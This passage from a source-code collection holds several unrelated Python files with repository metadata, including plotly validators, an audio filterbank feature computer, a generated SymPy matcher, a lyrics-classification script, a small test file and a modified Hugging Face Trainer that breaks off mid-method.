`tickmode` is set to "array". Used with `tickvals`. ticktextsrc Sets the source reference on plot.ly for ticktext . tickvals Sets the values at which ticks on this axis appear. Only has an effect if `tickmode` is set to "array". Used with `ticktext`. tickvalssrc Sets the source reference on plot.ly for tickvals . tickwidth Sets the tick width (in px). title plotly_study.graph_objects.scattergl.marker.colorbar. Title instance or dict with compatible properties titlefont Deprecated: Please use scattergl.marker.colorbar.title.font instead. Sets this color bar's title font. Note that the title's font used to be set by the now deprecated `titlefont` attribute. 
titleside Deprecated: Please use scattergl.marker.colorbar.title.side instead. Determines the location of color bar's title with respect to the color bar. Note that the title's location used to be set by the now deprecated `titleside` attribute. x Sets the x position of the color bar (in plot fraction). xanchor Sets this color bar's horizontal position anchor. This anchor binds the `x` position to the "left", "center" or "right" of the color bar. xpad Sets the amount of padding (in px) along the x direction. y Sets the y position of the color bar (in plot fraction). yanchor Sets this color bar's vertical position anchor This anchor binds the `y` position to the "top", "middle" or "bottom" of the color bar. ypad Sets the amount of padding (in px) along the y direction. """, ), **kwargs ) import _plotly_utils.basevalidators class ColoraxisValidator(_plotly_utils.basevalidators.SubplotidValidator): def __init__( self, plotly_name="coloraxis", parent_name="scattergl.marker", **kwargs ): super(ColoraxisValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, dflt=kwargs.pop("dflt", None), edit_type=kwargs.pop("edit_type", "calc"), regex=kwargs.pop("regex", "/^coloraxis([2-9]|[1-9][0-9]+)?$/"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class ColorValidator(_plotly_utils.basevalidators.ColorValidator): def __init__(self, plotly_name="color", parent_name="scattergl.marker", **kwargs): super(ColorValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), colorscale_path=kwargs.pop( "colorscale_path", "scattergl.marker.colorscale" ), **kwargs ) import _plotly_utils.basevalidators class CminValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="cmin", parent_name="scattergl.marker", **kwargs): super(CminValidator, self).__init__( plotly_name=plotly_name, 
parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {"cauto": False}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class CmidValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="cmid", parent_name="scattergl.marker", **kwargs): super(CmidValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class CmaxValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="cmax", parent_name="scattergl.marker", **kwargs): super(CmaxValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {"cauto": False}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class CautoValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__(self, plotly_name="cauto", parent_name="scattergl.marker", **kwargs): super(CautoValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class AutocolorscaleValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__( self, plotly_name="autocolorscale", parent_name="scattergl.marker", **kwargs ): super(AutocolorscaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {}), role=kwargs.pop("role", "style"), **kwargs )
841cd9e9d8193c58fdc4c4845d4a09b81a7bd904
2b8e7eadb920e96c75697880a9c5461aa8e0c5ed
/nabu/processing/processors/feature_computers/fbank.py
77c4ebb1d59833e9ebe2c1032e1545f7cb99d2f4
[ "MIT" ]
permissive
ishandutta2007/nabu
fb963ed3cd34ee340014e0c1e77927c838bba0ad
313018a46f68cec1d4a7eb15b8b1cf68111a959c
refs/heads/master
2020-04-03T04:57:57.911576
2018-12-14T11:02:52
2018-12-14T11:02:52
155,029,958
0
0
MIT
2018-12-06T18:20:12
2018-10-28T02:59:31
Python
UTF-8
Python
false
false
1,446
py
'''@file fbank.py contains the fbank feature computer''' import numpy as np import base import feature_computer from sigproc import snip class Fbank(feature_computer.FeatureComputer): '''the feature computer class to compute fbank features''' def comp_feat(self, sig, rate): ''' compute the features Args: sig: the audio signal as a 1-D numpy array rate: the sampling rate Returns: the features as a [seq_length x feature_dim] numpy array ''' #snip the edges sig = snip(sig, rate, float(self.conf['winlen']), float(self.conf['winstep'])) feat, energy = base.logfbank(sig, rate, self.conf) if self.conf['include_energy'] == 'True': feat = np.append(feat, energy[:, np.newaxis], 1) if self.conf['dynamic'] == 'delta': feat = base.delta(feat) elif self.conf['dynamic'] == 'ddelta': feat = base.ddelta(feat) elif self.conf['dynamic'] != 'nodelta': raise Exception('unknown dynamic type') return feat def get_dim(self): '''the feature dimemsion''' dim = int(self.conf['nfilt']) if self.conf['include_energy'] == 'True': dim += 1 if self.conf['dynamic'] == 'delta': dim *= 2 elif self.conf['dynamic'] == 'ddelta': dim *= 3 return dim
90146830bfe90f1fccd9b4b89f96401860d91053
f445450ac693b466ca20b42f1ac82071d32dd991
/generated_tempdir_2019_09_15_163300/generated_part009372.py
79176e5034b71cfcfb2a2bf71973eb4b7665d2c3
[]
no_license
Upabjojr/rubi_generated
76e43cbafe70b4e1516fb761cabd9e5257691374
cd35e9e51722b04fb159ada3d5811d62a423e429
refs/heads/master
2020-07-25T17:26:19.227918
2019-09-15T15:41:48
2019-09-15T15:41:48
208,357,412
4
1
null
null
null
null
UTF-8
Python
false
false
1,292
py
# NOTE(review): machine-generated matchpy matcher module (rubi_generated
# project). Do not edit the pattern tables by hand; regenerate instead.
from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *


class CommutativeMatcher77334(CommutativeMatcher):
    # Lazily-created singleton instance, see get().
    _instance = None
    # Pattern table: pattern index -> (pattern id, constant multiset,
    # variable descriptors). Presumably each VariableWithCount binds one
    # operand of a Mul; the second defaults to S(1) — TODO confirm against
    # matchpy's generator output format.
    patterns = {
        0: (0, Multiset({}), [
            (VariableWithCount('i3.3.1.0', 1, 1, None), Mul),
            (VariableWithCount('i3.3.1.0_1', 1, 1, S(1)), Mul)
        ])
    }
    # Per-matcher subject bookkeeping used by the CommutativeMatcher base.
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    # Matching is performed modulo the associative/commutative operation Mul.
    associative = Mul
    max_optional_count = 1
    anonymous_patterns = set()

    def __init__(self):
        self.add_subject(None)

    @staticmethod
    def get():
        # Create the singleton on first use, then reuse it.
        if CommutativeMatcher77334._instance is None:
            CommutativeMatcher77334._instance = CommutativeMatcher77334()
        return CommutativeMatcher77334._instance

    @staticmethod
    def get_match_iter(subject):
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 77333
        # The bare `return` followed by an unreachable `yield` makes this a
        # generator that is immediately exhausted (yields no matches).
        return
        yield

# NOTE(review): duplicate of the earlier deque import, emitted by the code
# generator; kept as-is.
from collections import deque
de6131cb7460f4df0537d86258086f70cd965e4f
73fbdbe4943cd4a8de371ba1af4b5cdfea3138d8
/project4_lyrics/lyrics_project/main.py
5b2eae2671200684d80d3cc5530e8486ab9cf16a
[]
no_license
GParolini/spiced_academy_projects
74524d99842e7659a38371b6e697f9fd90a9e0fa
64b9458c9294a767636211d59ae00e329fb527f5
refs/heads/master
2023-05-31T05:30:07.692702
2021-06-21T08:54:46
2021-06-21T08:54:46
363,920,518
0
0
null
2021-05-03T13:33:28
2021-05-03T12:22:05
null
UTF-8
Python
false
false
4,865
py
#!/usr/bin/env python
# coding: utf-8

# # Project 4: Web scraping and text classification
#
# Interactive script: scrapes lyrics for two artists from lyrics.com,
# trains two text classifiers (logistic regression and naive Bayes) to
# distinguish the artists, then predicts the author of user-supplied lyrics.

from colorama import init
from colorama import deinit
from colorama import Fore, Back, Style
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
# NOTE(review): get_lyric_urls, get_lyrics, read_metadata, read_lyrics and
# clean_text_to_list presumably come from this star import — verify in
# utilities.py.
from utilities import *

# Color print in terminal
init()

# Scraping data for artist1 (name and lyrics.com URL are read interactively)
print(Style.BRIGHT + Fore.RED + "Welcome to your lyrics finder")
print(Fore.RED + "I can help you find the lyrics of your favourite artist on lyrics.com")
print(Fore.GREEN + "Please provide below the name of the artist")
name1 = input()
print(Fore.GREEN + "Please provide below the link to the artist webpage on lyrics.com")
url1 = input()
urls_lyrics_list1 = get_lyric_urls(url1, name1)
lyrics_files1 = get_lyrics(urls_lyrics_list1, name1)

# Reading the scraped data for artist1
metadata_df1 = read_metadata(name1)
lyrics_df1 = read_lyrics(name1)
df_artist1 = metadata_df1.merge(lyrics_df1)

# Scraping data for artist2
print(Fore.RED + "You can select a second artist and then you can quiz me about the two artists")
print(Fore.GREEN + "Please provide below the name of the artist")
name2 = input()
print(Fore.GREEN + "Please provide below the link to the artist webpage on lyrics.com")
url2 = input()
urls_lyrics_list2 = get_lyric_urls(url2, name2)
lyrics_files2 = get_lyrics(urls_lyrics_list2, name2)

# Reading the scraped data for artist2
metadata_df2 = read_metadata(name2)
lyrics_df2 = read_lyrics(name2)
df_artist2 = metadata_df2.merge(lyrics_df2)

# Joining the two artists' dataframes; "author" is the classification target
df = pd.concat([df_artist1, df_artist2])

# train-test split (fixed random_state for reproducibility)
X_train, X_test, y_train, y_test = train_test_split(df.drop(["author"], axis=1), df["author"], test_size=0.2, random_state=42)

# cleaning the lyrics texts and transforming them into a list of strings
list_cleaned_lyrics_train = clean_text_to_list(X_train)
labels_train = y_train.tolist()

# Bag of words: TF-IDF vectorizer fitted on the training lyrics only
vect = TfidfVectorizer()
X = vect.fit_transform(list_cleaned_lyrics_train)

# Transforming the test set with the already-fitted vectorizer
list_cleaned_lyrics_test = clean_text_to_list(X_test)
X_test_transformed = vect.transform(list_cleaned_lyrics_test)

# Fitting a logistic regression model (class_weight balances unequal
# numbers of songs per artist)
model_lr = LogisticRegression(class_weight='balanced').fit(X, y_train)
score_lr = model_lr.score(X, y_train)

# Checking how the logistic regression model performs on the test set
# (score_lr is rebound here to the test score, overwriting the train score)
ypred = model_lr.predict(X_test_transformed)
score_lr = model_lr.score(X_test_transformed, y_test)
probs_lr = model_lr.predict_proba(X_test_transformed)

print(Fore.RED + "I am a data savvy software.")
print(Fore.RED + "I can tell you that a logistic regression model applied to classify")
print(Fore.RED + "the data of your two artists has a score of ", Back.GREEN + str(score_lr))
print(Back.RESET + Fore.RED + "and the probabilities for each entry in the test set are as follow ", Fore.RESET + str(probs_lr))

# Fitting a Naive Bayes model with Laplace smoothing (alpha=1)
model_nb = MultinomialNB(alpha=1).fit(X, y_train)
model_nb.score(X, y_train)

# Checking how the Naive Bayes Model performs on the test set
ypred_nb = model_nb.predict(X_test_transformed)
score_nb = model_nb.score(X_test_transformed, y_test)
probs_nb = model_nb.predict_proba(X_test_transformed)

print(Back.RESET + Fore.RED + "Do no take me for a pedantic software, but I can also tell you that")
print(Fore.RED + "a Naive Bayes model applied to classify the data of your two artists has a score of ", Back.GREEN + str(score_nb))
print(Back.RESET + Fore.RED + "and the probabilities for each entry in the test set are as follow ", Back.RESET + Fore.RESET + str(probs_nb))

# Testing user input: let the user pick a model and classify pasted lyrics
print(Back.RESET + Fore.RED + "Now, please select a model between Logistic Regression and Naive Bayes.")
print(Fore.RED + "Then you can quiz me with a few of your favourite lyrics.")
print(Fore.RED + "I will tell you who is the author of the lyrics.")
print(Fore.GREEN + "Please input your model choice (LR for Logistic Regression and NB for Naive Bayes)")
model_to_use = input()
print(Fore.GREEN + "Please input some lyrics for me to examine: ")
user_lyrics = input()
user_lyrics_transformed = vect.transform([user_lyrics])

if model_to_use == "LR":
    lr_pred = model_lr.predict(user_lyrics_transformed)
    lr_prob = model_lr.predict_proba(user_lyrics_transformed)
    print(Fore.YELLOW + Back.BLACK + str(lr_pred), str(lr_prob))
if model_to_use == "NB":
    nb_pred = model_nb.predict(user_lyrics_transformed)
    nb_prob = model_nb.predict_proba(user_lyrics_transformed)
    print(Fore.YELLOW + Back.BLACK + str(nb_pred), str(nb_prob))
if (model_to_use != "LR") and (model_to_use != "NB"):
    out = "You did not select a valid model"
    print(Fore.YELLOW + Back.BLACK + out)

# Restore the terminal's original stdout/stderr handling
deinit()
609760859820be1e68a6de0cb45de2de2a4b6eb9
b77e464c1051dbec0dea6deaf63ccc393c17c84c
/tests/test_base.py
b49f58ee4e9aca182c4a93894ccbbe58618c0117
[ "Unlicense" ]
permissive
victtorvpb/flask-cash-back-plataform
63dad5677811df8d24999a6c4ad5e46d91d87dcd
301bcad96662e7ba8f74b8e6896248f2ac2854d3
refs/heads/main
2023-07-12T02:46:23.526791
2021-08-16T23:01:11
2021-08-16T23:01:32
397,004,794
0
0
null
null
null
null
UTF-8
Python
false
false
389
py
import pytest from flask_cash_back_plataform import BaseClass, base_function given = pytest.mark.parametrize @given("fn", [BaseClass(), base_function]) def test_parameterized(fn): assert "hello from" in fn() def test_base_function(): assert base_function() == "hello from base function" def test_base_class(): assert BaseClass().base_method() == "hello from BaseClass"
4fc79439d5cdb7cacba4370b7e8d37f14b961c4a
ac32bac45df77083f4ef3115e747038a6753936c
/adapter-transformers-customs/adapter-transformers-attn/src/transformers/trainer-with-sub-model-list.py
4c0c31f94fbf40ec2a6cf77be31c8626e614571d
[ "Apache-2.0" ]
permissive
Yujin-Yujin/rexpert
13e1d5c4ca55664dd9fbb9a765ea5157a2e0893f
ed8628dc053194fee40e593b1cc5ec45a26c8073
refs/heads/main
2023-06-22T05:58:42.269923
2021-07-23T06:35:43
2021-07-23T06:35:43
373,423,887
0
0
null
null
null
null
UTF-8
Python
false
false
82,655
py
# coding=utf-8 # Copyright 2020-present the HuggingFace Inc. team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ The Trainer class, to easily train a 🤗 Transformers from scratch or finetune it on a new task. """ import collections import inspect import math import os import re import shutil import warnings from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Tuple, Union # Integrations must be imported before ML frameworks: from .integrations import ( # isort: split default_hp_search_backend, hp_params, is_azureml_available, is_comet_available, is_mlflow_available, is_optuna_available, is_ray_available, is_tensorboard_available, is_wandb_available, run_hp_search_optuna, run_hp_search_ray, ) import numpy as np import torch from packaging import version from torch import nn from torch.utils.data.dataloader import DataLoader from torch.utils.data.dataset import Dataset from torch.utils.data.distributed import DistributedSampler from torch.utils.data.sampler import RandomSampler, SequentialSampler from .data.data_collator import DataCollator, DataCollatorWithPadding, default_data_collator from .file_utils import WEIGHTS_NAME, is_datasets_available, is_in_notebook, is_torch_tpu_available from .modeling_auto import MODEL_FOR_QUESTION_ANSWERING_MAPPING from .modeling_utils import PreTrainedModel from .optimization import AdamW, get_linear_schedule_with_warmup from .tokenization_utils_base import PreTrainedTokenizerBase from .trainer_callback import ( 
CallbackHandler, DefaultFlowCallback, PrinterCallback, ProgressCallback, TrainerCallback, TrainerControl, TrainerState, ) from .trainer_pt_utils import ( DistributedTensorGatherer, SequentialDistributedSampler, distributed_broadcast_scalars, distributed_concat, get_tpu_sampler, nested_concat, nested_detach, nested_numpify, nested_xla_mesh_reduce, reissue_pt_warnings, ) from .trainer_utils import ( PREFIX_CHECKPOINT_DIR, BestRun, EvalPrediction, HPSearchBackend, PredictionOutput, TrainOutput, default_compute_objective, default_hp_space, set_seed, ) from .training_args import TrainingArguments from .utils import logging _use_native_amp = False _use_apex = False DEFAULT_CALLBACKS = [DefaultFlowCallback] DEFAULT_PROGRESS_CALLBACK = ProgressCallback if is_in_notebook(): from .utils.notebook import NotebookProgressCallback DEFAULT_PROGRESS_CALLBACK = NotebookProgressCallback # Check if Pytorch version >= 1.6 to switch between Native AMP and Apex if version.parse(torch.__version__) < version.parse("1.6"): from .file_utils import is_apex_available if is_apex_available(): from apex import amp _use_apex = True else: _use_native_amp = True from torch.cuda.amp import autocast if version.parse(torch.__version__) < version.parse("1.2"): _use_ddp_no_sync = False else: _use_ddp_no_sync = True if is_datasets_available(): import datasets if is_torch_tpu_available(): import torch_xla.core.xla_model as xm import torch_xla.debug.metrics as met import torch_xla.distributed.parallel_loader as pl if is_tensorboard_available(): from .integrations import TensorBoardCallback DEFAULT_CALLBACKS.append(TensorBoardCallback) if is_wandb_available(): from .integrations import WandbCallback DEFAULT_CALLBACKS.append(WandbCallback) if is_comet_available(): from .integrations import CometCallback DEFAULT_CALLBACKS.append(CometCallback) if is_mlflow_available(): from .integrations import MLflowCallback DEFAULT_CALLBACKS.append(MLflowCallback) if is_optuna_available(): import optuna if 
is_ray_available(): from ray import tune if is_azureml_available(): from .integrations import AzureMLCallback DEFAULT_CALLBACKS.append(AzureMLCallback) logger = logging.get_logger(__name__) class Trainer: """ Trainer is a simple but feature-complete training and eval loop for PyTorch, optimized for 🤗 Transformers. Args: model (:class:`~transformers.PreTrainedModel` or :obj:`torch.nn.Module`, `optional`): The model to train, evaluate or use for predictions. If not provided, a ``model_init`` must be passed. .. note:: :class:`~transformers.Trainer` is optimized to work with the :class:`~transformers.PreTrainedModel` provided by the library. You can still use your own models defined as :obj:`torch.nn.Module` as long as they work the same way as the 🤗 Transformers models. args (:class:`~transformers.TrainingArguments`, `optional`): The arguments to tweak for training. Will default to a basic instance of :class:`~transformers.TrainingArguments` with the ``output_dir`` set to a directory named `tmp_trainer` in the current directory if not provided. data_collator (:obj:`DataCollator`, `optional`): The function to use to form a batch from a list of elements of :obj:`train_dataset` or :obj:`eval_dataset`. Will default to :func:`~transformers.default_data_collator` if no ``tokenizer`` is provided, an instance of :func:`~transformers.DataCollatorWithPadding` otherwise. train_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): The dataset to use for training. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. eval_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): The dataset to use for evaluation. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. tokenizer (:class:`PreTrainedTokenizerBase`, `optional`): The tokenizer used to preprocess the data. 
If provided, will be used to automatically pad the inputs the maximum length when batching inputs, and it will be saved along the model to make it easier to rerun an interrupted training or reuse the fine-tuned model. model_init (:obj:`Callable[[], PreTrainedModel]`, `optional`): A function that instantiates the model to be used. If provided, each call to :meth:`~transformers.Trainer.train` will start from a new instance of the model as given by this function. The function may have zero argument, or a single one containing the optuna/Ray Tune trial object, to be able to choose different architectures according to hyper parameters (such as layer count, sizes of inner layers, dropout probabilities etc). compute_metrics (:obj:`Callable[[EvalPrediction], Dict]`, `optional`): The function that will be used to compute metrics at evaluation. Must take a :class:`~transformers.EvalPrediction` and return a dictionary string to metric values. callbacks (List of :obj:`~transformers.TrainerCallback`, `optional`): A list of callbacks to customize the training loop. Will add those to the list of default callbacks detailed in :doc:`here <callback>`. If you want to remove one of the default callbacks used, use the :meth:`Trainer.remove_callback` method. optimizers (:obj:`Tuple[torch.optim.Optimizer, torch.optim.lr_scheduler.LambdaLR`, `optional`): A tuple containing the optimizer and the scheduler to use. Will default to an instance of :class:`~transformers.AdamW` on your model and a scheduler given by :func:`~transformers.get_linear_schedule_with_warmup` controlled by :obj:`args`. kwargs: Deprecated keyword arguments. 
""" def __init__( self, model: Union[PreTrainedModel, torch.nn.Module] = None, sub_model_list: Optional[List[Union[PreTrainedModel, torch.nn.Module]]] = None, args: TrainingArguments = None, data_collator: Optional[DataCollator] = None, train_dataset: Optional[Dataset] = None, eval_dataset: Optional[Dataset] = None, tokenizer: Optional["PreTrainedTokenizerBase"] = None, model_init: Callable[[], PreTrainedModel] = None, compute_metrics: Optional[Callable[[EvalPrediction], Dict]] = None, callbacks: Optional[List[TrainerCallback]] = None, do_save_full_model: bool = True, do_save_adapters: bool = False, do_save_adapter_fusion: bool = False, adapter_names: Optional[List[List[str]]] = None, optimizers: Tuple[torch.optim.Optimizer, torch.optim.lr_scheduler.LambdaLR] = (None, None), **kwargs, ): if args is None: logger.info("No `TrainingArguments` passed, using the current path as `output_dir`.") args = TrainingArguments("tmp_trainer") self.args = args # Seed must be set before instantiating the model when using model set_seed(self.args.seed) assert ( model is not None or model_init is not None ), "You must provide a model to use `Trainer`, either by using the `model` argument or the `model_init` argument." 
self.model_init = model_init self.hp_name = None if model is None and model_init is not None: model = self.call_model_init() self.model = model.to(args.device) if model is not None else None if sub_model_list is None: self.sub_model_list = None else: if len(sub_model_list) > 0 : self.sub_model_list = nn.ModuleList(sub_model_list).to(args.device) else: self.sub_model_list = None default_collator = default_data_collator if tokenizer is None else DataCollatorWithPadding(tokenizer) self.data_collator = data_collator if data_collator is not None else default_collator self.train_dataset = train_dataset self.eval_dataset = eval_dataset self.tokenizer = tokenizer self.compute_metrics = compute_metrics self.optimizer, self.lr_scheduler = optimizers if model_init is not None and (self.optimizer is not None or self.lr_scheduler is not None): raise RuntimeError( "Passing a `model_init` is incompatible with providing the `optimizers` argument." "You should subclass `Trainer` and override the `create_optimizer_and_scheduler` method." ) callbacks = DEFAULT_CALLBACKS if callbacks is None else DEFAULT_CALLBACKS + callbacks self.callback_handler = CallbackHandler(callbacks, self.model, self.optimizer, self.lr_scheduler) self.add_callback(PrinterCallback if self.args.disable_tqdm else DEFAULT_PROGRESS_CALLBACK) # Deprecated arguments if "tb_writer" in kwargs: warnings.warn( "Passing `tb_writer` as a keyword argument is deprecated and won't be possible in a " + "future version. Use `TensorBoardCallback(tb_writer=...)` instead and pass it to the `callbacks`" + "argument", FutureWarning, ) tb_writer = kwargs.pop("tb_writer") self.remove_callback(TensorBoardCallback) self.add_callback(TensorBoardCallback(tb_writer=tb_writer)) if "prediction_loss_only" in kwargs: warnings.warn( "Passing `prediction_loss_only` as a keyword argument is deprecated and won't be possible in a " + "future version. Use `args.prediction_loss_only` instead. 
Setting " + f"`args.prediction_loss_only={kwargs['prediction_loss_only']}", FutureWarning, ) self.args.prediction_loss_only = kwargs.pop("prediction_loss_only") assert kwargs == {}, f"Unexpected keyword arguments: {list(kwargs.keys())}." # Will be set to True by `self._setup_loggers()` on first call to `self.log()`. self._loggers_initialized = False # Create output directory if needed if self.is_world_process_zero(): os.makedirs(self.args.output_dir, exist_ok=True) # adapters used self.do_save_full_model = do_save_full_model self.do_save_adapters = do_save_adapters self.do_save_adapter_fusion = do_save_adapter_fusion self.adapter_names = adapter_names if is_torch_tpu_available() and isinstance(self.model, PreTrainedModel): # Set an xla_device flag on the model's config. # We'll find a more elegant and not need to do this in the future. self.model.config.xla_device = True if not callable(self.data_collator) and callable(getattr(self.data_collator, "collate_batch", None)): self.data_collator = self.data_collator.collate_batch warnings.warn( ( "The `data_collator` should now be a simple callable (function, class with `__call__`), classes " + "with a `collate_batch` are deprecated and won't be supported in a future version." 
), FutureWarning, ) if args.max_steps > 0: logger.info("max_steps is given, it will override any value given in num_train_epochs") # Enforce rules on using datasets with no __len__ if train_dataset is not None and not isinstance(train_dataset, collections.abc.Sized) and args.max_steps <= 0: raise ValueError("train_dataset does not implement __len__, max_steps has to be specified") if eval_dataset is not None and not isinstance(eval_dataset, collections.abc.Sized): raise ValueError("eval_dataset must implement __len__") if is_datasets_available(): if isinstance(train_dataset, datasets.Dataset): self._remove_unused_columns(self.train_dataset, description="training") if isinstance(eval_dataset, datasets.Dataset): self._remove_unused_columns(self.eval_dataset, description="evaluation") self.state = TrainerState() self.control = TrainerControl() # Internal variable for total_flos used to count as tensors (for distributed + TPU), will be sent in the # state at each call to self.log. self._total_flos = None if self.args.fp16 and _use_native_amp: self.scaler = torch.cuda.amp.GradScaler() self.hp_search_backend = None self.use_tune_checkpoints = False default_label_names = ( ["start_positions", "end_positions"] if type(self.model) in MODEL_FOR_QUESTION_ANSWERING_MAPPING.values() else ["labels"] ) self.label_names = default_label_names if self.args.label_names is None else self.args.label_names self.control = self.callback_handler.on_init_end(self.args, self.state, self.control) def add_callback(self, callback): """ Add a callback to the current list of :class:`~transformer.TrainerCallback`. Args: callback (:obj:`type` or :class:`~transformer.TrainerCallback`): A :class:`~transformer.TrainerCallback` class or an instance of a :class:`~transformer.TrainerCallback`. In the first case, will instantiate a member of that class. 
""" self.callback_handler.add_callback(callback) def pop_callback(self, callback): """ Remove a callback from the current list of :class:`~transformer.TrainerCallback` and returns it. If the callback is not found, returns :obj:`None` (and no error is raised). Args: callback (:obj:`type` or :class:`~transformer.TrainerCallback`): A :class:`~transformer.TrainerCallback` class or an instance of a :class:`~transformer.TrainerCallback`. In the first case, will pop the first member of that class found in the list of callbacks. Returns: :class:`~transformer.TrainerCallback`: The callback removed, if found. """ return self.callback_handler.pop_callback(callback) def remove_callback(self, callback): """ Remove a callback from the current list of :class:`~transformer.TrainerCallback`. Args: callback (:obj:`type` or :class:`~transformer.TrainerCallback`): A :class:`~transformer.TrainerCallback` class or an instance of a :class:`~transformer.TrainerCallback`. In the first case, will remove the first member of that class found in the list of callbacks. """ self.callback_handler.remove_callback(callback) def _remove_unused_columns(self, dataset: "datasets.Dataset", description: Optional[str] = None): if not self.args.remove_unused_columns: return # Inspect model forward signature to keep only the arguments it accepts. signature = inspect.signature(self.model.forward) signature_columns = list(signature.parameters.keys()) # Labels may be named label or label_ids, the default data collator handles that. signature_columns += ["label", "label_ids"] columns = [k for k in signature_columns if k in dataset.column_names] ignored_columns = list(set(dataset.column_names) - set(signature_columns)) dset_description = "" if description is None else f"in the {description} set " logger.info( f"The following columns {dset_description}don't have a corresponding argument in `{self.model.__class__.__name__}.forward` and have been ignored: {', '.join(ignored_columns)}." 
) dataset.set_format(type=dataset.format["type"], columns=columns) def _get_train_sampler(self) -> Optional[torch.utils.data.sampler.Sampler]: if isinstance(self.train_dataset, torch.utils.data.IterableDataset) or not isinstance( self.train_dataset, collections.abc.Sized ): return None elif is_torch_tpu_available(): return get_tpu_sampler(self.train_dataset) else: return ( RandomSampler(self.train_dataset) if self.args.local_rank == -1 else DistributedSampler(self.train_dataset) ) def get_train_dataloader(self) -> DataLoader: """ Returns the training :class:`~torch.utils.data.DataLoader`. Will use no sampler if :obj:`self.train_dataset` does not implement :obj:`__len__`, a random sampler (adapted to distributed training if necessary) otherwise. Subclass and override this method if you want to inject some custom behavior. """ if self.train_dataset is None: raise ValueError("Trainer: training requires a train_dataset.") train_sampler = self._get_train_sampler() return DataLoader( self.train_dataset, batch_size=self.args.train_batch_size, sampler=train_sampler, collate_fn=self.data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, ) def _get_eval_sampler(self, eval_dataset: Dataset) -> Optional[torch.utils.data.sampler.Sampler]: if is_torch_tpu_available(): return SequentialDistributedSampler(eval_dataset, num_replicas=xm.xrt_world_size(), rank=xm.get_ordinal()) elif self.args.local_rank != -1: return SequentialDistributedSampler(eval_dataset) else: return SequentialSampler(eval_dataset) def get_eval_dataloader(self, eval_dataset: Optional[Dataset] = None) -> DataLoader: """ Returns the evaluation :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: eval_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): If provided, will override :obj:`self.eval_dataset`. 
If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`. """ if eval_dataset is None and self.eval_dataset is None: raise ValueError("Trainer: evaluation requires an eval_dataset.") elif eval_dataset is not None and not isinstance(eval_dataset, collections.abc.Sized): raise ValueError("eval_dataset must implement __len__") elif is_datasets_available() and isinstance(eval_dataset, datasets.Dataset): self._remove_unused_columns(eval_dataset, description="evaluation") eval_dataset = eval_dataset if eval_dataset is not None else self.eval_dataset eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader( eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=self.data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, ) def get_test_dataloader(self, test_dataset: Dataset) -> DataLoader: """ Returns the test :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: test_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): The test dataset to use. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`. """ if not isinstance(test_dataset, collections.abc.Sized): raise ValueError("test_dataset must implement __len__") elif is_datasets_available() and isinstance(test_dataset, datasets.Dataset): self._remove_unused_columns(test_dataset, description="test") test_sampler = self._get_eval_sampler(test_dataset) # We use the same batch_size as for eval. 
